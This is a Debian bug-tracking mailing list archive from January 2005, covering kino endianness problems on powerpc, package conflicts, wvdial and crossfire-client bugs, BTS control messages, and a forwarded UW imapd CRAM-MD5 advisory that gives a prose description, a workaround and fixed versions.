>From [EMAIL PROTECTED] Fri Jan 28 01:57:12 2005
Return-path: <[EMAIL PROTECTED]>
Received: from antares.tat.physik.uni-tuebingen.de [134.2.170.62] 
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CuSsK-00056T-00; Fri, 28 Jan 2005 01:57:12 -0800
Received: from localhost (localhost [127.0.0.1])
by antares.tat.physik.uni-tuebingen.de (Postfix) with ESMTP id 
A88574A65A;
Fri, 28 Jan 2005 10:57:10 +0100 (CET)
Received: from antares.tat.physik.uni-tuebingen.de ([127.0.0.1])
by localhost (antares [127.0.0.1]) (amavisd-new, port 10024)
with LMTP id 21030-05; Fri, 28 Jan 2005 10:57:01 +0100 (CET)
Received: by antares.tat.physik.uni-tuebingen.de (Postfix, from userid 1000)
id 8F5204A663; Fri, 28 Jan 2005 10:57:01 +0100 (CET)
Date: Fri, 28 Jan 2005 10:57:01 +0100
From: Daniel Kobras <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [EMAIL PROTECTED]: Bug#289182: kino endianness issues on powerpc]
Message-ID: <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Mail-Followup-To: [EMAIL PROTECTED],
[EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.6+20040907i
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at 
tat.physik.uni-tuebingen.de
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-11.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER,
HAS_PACKAGE autolearn=ham version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Moi!

I've received a bug report (quoted below) by a Debian user about
multiple endianness issues when trying to use kino on a powerpc system.
As I don't have a Linux/ppc desktop available any longer these days, I'd
like to ask for your help on resolving these problems.

As for the inverted colours when using Xv display, this might be related
to an Xv bug we discussed on the libdv-dev mailing list back in june
2002 ("Should dv1394 work on PPC" - are there still mail archives around
that work and don't suck?).

Looking at the source code, I've already confirmed the source of the
audio problems. WAV export in kino_av_pipe indeed is not endian-clean.
Fixing the header will be easy, preferrably using the endian_types.h
header I've been pimping on this list for a while. But I'm not so sure
about the audio data itself. Specifically, I wonder whether its
endianness might be different, depending on whether it's imported from a
file, or via ieee1394? In any case, the various Resample methods in
frame.cc look like the best place to take care of endianness conversions
as well. Also, is PCM output always supposed to be in little-endian
format like WAV, or can we stick with native endianness there?

As far as the problems with video encoding are concerned, I'm hoping on
input from you. I don't know how endianness is spec'ed in the various
video formats. Maybe we can even get away with adding the proper
command-line switches to the external export filters?

Regards,

Daniel.

- Forwarded message from Michael Schmitz <[EMAIL PROTECTED]> -

From: Michael Schmitz <[EMAIL PROTECTED]>
Date: Fri, 7 Jan 2005 18:37:52 +0100 (CET)
To: [EMAIL PROTECTED]
Reply-To: Michael Schmitz <[EMAIL PROTECTED]>,
[EMAIL PROTECTED]
Subject: Bug#289182: kino endianness issues on powerpc

Package: kino
Version: 0.75-2
Severity: serious

kino appears to have multiple issues with data endianness on powerpc.

Symptoms:

Video display: fine when using GDK, reverse video (or rather: magenta on
cyan) when using XV for display in the edit and trim menus. Audio in
edit/trim mode is fine BTW (see audio problems below).

Video export: when using the MPEG export with mjpegtools 1.6.2-0.7 (built
from source from Christian Marillat's site), mp2enc fails to produce
output with a message like

EOF in WAV header when searching for tag "data"

The resulting .mpv file shows the same reverse video effects as the XV
display in edit/trim mode.

Audio export: Exporting to WAV format directly results in audio data that
can't be used with mp2enc, while exporting to WAV format using sox
generates correct data (feeding such data to the MPEG encode process
results in reverse video, correct audio files).

Processed: only appears to break in sid

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 291785 sid
Bug#291785: uw-imap_7:2002edebian1-5(ia64/unstable): FTBFS: dh_installlogrotate 
error
There were no tags set.
Tags added: sid

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Tag

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 292604 + pending
Bug#292604: icons should not have suddenly changed from icons to gallery-icons
Tags were: pending
Tags added: pending

> --
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Tag pending

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tag 292604 +pending
Bug#292604: icons should not have suddenly changed from icons to gallery-icons
There were no tags set.
Tags added: pending

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: fixed version has reached sarge

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 289446 -sarge
Bug#289446: needs Getopt/Std.pm but doesn't depend on perl-modules
Tags were: sarge patch
Tags removed: sarge

> close 289446
Bug#289446: needs Getopt/Std.pm but doesn't depend on perl-modules
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug closed, send any further explanations to Robert Millan <[EMAIL PROTECTED]>

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: fix has reached testing

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 289295 -sarge
Bug#289295: heimdal-kdc: fresh installation fails: Section realms::REALM.ORG 
doesn't exist
Tags were: sarge patch
Tags removed: sarge

> close 289295
Bug#289295: heimdal-kdc: fresh installation fails: Section realms::REALM.ORG 
doesn't exist
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug closed, send any further explanations to Peter Lundkvist <[EMAIL PROTECTED]>

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292569: kdelibs-data: conflicts with openoffic.org

2005-01-28 Thread Hilmar Preusse
On 27.01.05 Robert Waldner ([EMAIL PROTECTED]) wrote:

Hi,

> Whilst installing amarok, I encountered the following error:
> 
> Unpacking kdelibs-data (from .../kdelibs-data_4%3a3.3.2-1_all.deb) ...
> dpkg: error processing
> /var/cache/apt/archives/kdelibs-data_4%3a3.3.2-1_all.deb (--unpack):
>  trying to overwrite
>  `/usr/share/mimelnk/application/vnd.sun.xml.calc.desktop', which is
>  also in package openoffice.org
> 
> Installed is openoffice.org 1.0.3-2, on a mixed stable/testing/unstable
> system.
> 
According to

http://packages.debian.org/cgi-bin/search_contents.pl?word=%2Fusr%2Fshare%2Fmimelnk%2Fapplication%2Fvnd.sun.xml.calc.desktop&searchmode=searchfiles&case=insensitive&version=unstable&arch=i386

that file is only contained in kdelibs-data. So please close that
bug. I've checked only x86, but that should be the architecture
you're using.

Regards,
  Hilmar
-- 
sigmentation fault


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292618: wvdial: doesn't initialize serial port correctly since last update

2005-01-28 Thread Wolfram Quester
Package: wvdial
Version: 1.54.0-1.1
Severity: grave
Justification: renders package unusable

Hi,

I updated wvdial some days ago and cannot use my modems since then. One
of the modems is bluetooth device connected on /dev/rfcomm0. wvdial
gives:
[EMAIL PROTECTED]:~ $ wvdial
--> WvDial: Internet dialer version 1.54.0
--> Cannot open /dev/rfcomm0: Cannot get information for serial port.
--> Cannot open /dev/rfcomm0: Input/output error
--> Cannot open /dev/rfcomm0: Cannot get information for serial port.

In the syslog I see
Jan 28 10:58:00 halley kernel: rfcomm_tty_ioctl: TIOCGSERIAL is not supported

My other modem is connected by an usb-serial adapter and wvdial gives me
[EMAIL PROTECTED]:~ $ wvdial
--> WvDial: Internet dialer version 1.54.0
--> Cannot open /dev/ttyUSB0: Cannot get information for serial port.
--> Cannot open /dev/ttyUSB0: Cannot get information for serial port.
--> Cannot open /dev/ttyUSB0: Cannot get information for serial port.
syslog shows nothing.

Since I can connect fine using pon/poff, I guess the fault is in wvdial
or libwvstreams, since this is the major change in the last release.

With best regards,

Wolfi


-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: powerpc (ppc)
Kernel: Linux 2.6.10-wjq
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF-8)

Versions of packages wvdial depends on:
ii  libc6   2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libgcc1 1:3.5-0pre0  GCC support library
ii  libstdc++5  1:3.3.5-6The GNU Standard C++ Library v3
ii  libwvstreams4.0-base4.0.1-1.2C++ network libraries for rapid ap
ii  libwvstreams4.0-extras  4.0.1-1.2C++ network libraries for rapid ap
ii  ppp 2.4.2+20040428-6 Point-to-Point Protocol (PPP) daem

-- no debconf information


signature.asc
Description: Digital signature


Bug#292609: crossfire-client-gtk: Hangs or crashes GTK

2005-01-28 Thread Alvaro Martinez
Subject: crossfire-client-gtk: Hangs or crashes GTK
Package: crossfire-client-gtk
Version: 1.7.0-3
Severity: grave
Justification: causes non-serious data loss

*** Please type your report below this line ***
As the game goes on the memory usage seems to grow until
no free memory remains.

When the system used kernel 2.4, it crashed gnome every time i played
but now the running kernel is 2.6.10-1 and the client only hangs gnome
and the swap is used very much.

I guess it's caused by the use of the gtk-text widget.


-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.10-1-686
Locale: LANG=es_MX.UTF-8, LC_CTYPE=es_MX.UTF-8 (charmap=UTF-8)

Versions of packages crossfire-client-gtk depends on:
ii  crossfire-client  1.7.0-3Base Client of the game
Crossfire
ii  crossfire-client-images   1.7.0  Base crossfire-client images
ii  libc6 2.3.2.ds1-20   GNU C Library: Shared libraries
an
ii  libglib1.21.2.10-9   The GLib library of C routines
ii  libgtk1.2 1.2.10-17  The GIMP Toolkit set of widgets
fo
ii  libpng12-01.2.8rel-1 PNG library - runtime
ii  libx11-6  4.3.0.dfsg.1-4 X Window System protocol client
li
ii  libxext6  4.3.0.dfsg.1-4 X Window System miscellaneous
exte
ii  libxi64.3.0.dfsg.1-4 X Window System Input extension
li
ii  xlibs 4.3.0.dfsg.1-4 X Window System client
libraries m
ii  zlib1g1:1.2.1.1-5compression library - runtime

-- no debconf information

-- 
GMX im TV ... Die Gedanken sind frei ... Schon gesehen?
Jetzt Spot online ansehen: http://www.gmx.net/de/go/tv-spot


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292606: uw-imapd: CRAM-MD5 SASL authentication contains vulnerability

2005-01-28 Thread Tomas Pospisek
Package: uw-imapd
Severity: grave
Justification: user security hole

The following email appearead on the c-client mailing list today. Thus I
suppose the currenlty shipping libc-client is vulnerable too:


>From [EMAIL PROTECTED] Fri Jan 28 08:33:16 2005
Date: Thu, 27 Jan 2005 14:23:14 -0800 (Pacific Standard Time)
From: Mark Crispin <[EMAIL PROTECTED]>
To: c-client Interest List <[EMAIL PROTECTED]>,
 [EMAIL PROTECTED]
Subject: vulnerability and fix in UW imapd

Problem:

Versions of UW imapd released prior to January 4, 2005 fail to properly 
authenticate users when using CRAM-MD5 SASL authentication.


Details:

The University of Washington IMAP server features multiple user 
authentication methods, including the Challenge-Response Authentication 
Mechanism with MD5 (CRAM-MD5) as defined by RFC2195.  A logic error in the 
code that handles CRAM-MD5 incorrectly specifies the conditions of 
successful authentication.  This error results in a vulnerability that 
could allow a remote attacker to successfully authenticate as any user on 
the target system.


Impact limitation:

This vulnerability ONLY affects sites that have explicitly enabled 
CRAM-MD5 style authentication by creating an /etc/cram-md5.pwd file. 
CRAM-MD5 style authentication is NOT enabled in the default configuration 
of UW imapd.

Consequently, sites which do not use CRAM-MD5 style authentication (the 
majority of UW imapd sites) are NOT vulnerable.  An IMAP server which does 
not advertise CRAM-MD5 style authentication is NOT vulnerable.


Workaround:

If the site uses CRAM-MD5 style authentication, delete or rename the 
/etc/cram-md5.pwd file to some other name.  Note that doing so will revert 
all passwords to those in the UNIX password system.


Solution:

This problem is fixed in the January 4, 2005 release version of imap-2004b 
and in all subsequent versions (the current release version is 
imap-2004c1).  This problem is also fixed in the UW imapd version bundled 
with Pine version 4.62.

The current release version of UW imapd is available at:
ftp://ftp.cac.washington.edu/mail/imap.tar.Z

The current release version of Pine is available at:
http://www.washington.edu/pine/getpine
ftp://ftp.cac.washington.edu/pine/

For more details about this issue, please refer to:
http://www.kb.cert.org/vuls/id/702777

-- Mark --

http://staff.washington.edu/mrc
Science does not emerge from voting, party politics, or public debate.
Si vis pacem, para bellum.
-- 
--
 For information about this mailing list, and its archives, see: 
 http://www.washington.edu/imap/c-client-list.html
--



-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.4.22
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages uw-imapd depends on:
ii  debconf 1.4.30.11Debian configuration management sy
ii  libc-client2002edebian  7:2002edebian1-4 UW c-client library for mail proto
ii  libc6   2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libcomerr2  1.35-6   The Common Error Description libra
ii  libkrb531.3.6-1  MIT Kerberos runtime libraries
ii  libpam-runtime  0.76-22  Runtime support for the PAM librar
ii  libpam0g0.76-22  Pluggable Authentication Modules l
ii  libssl0.9.7 0.9.7e-2 SSL shared libraries
ii  openssl 0.9.7e-2 Secure Socket Layer (SSL) binary a


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#292604: libapache-gallery-perl: Neet "SetHandler None" for the images

2005-01-28 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> severity 292604 serious
Bug#292604: libapache-gallery-perl: Neet "SetHandler None" for the images
Severity set to `serious'.

> retitle 292604 icons should not have suddenly changed from icons to 
> gallery-icons
Bug#292604: libapache-gallery-perl: Neet "SetHandler None" for the images
Changed Bug title.

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]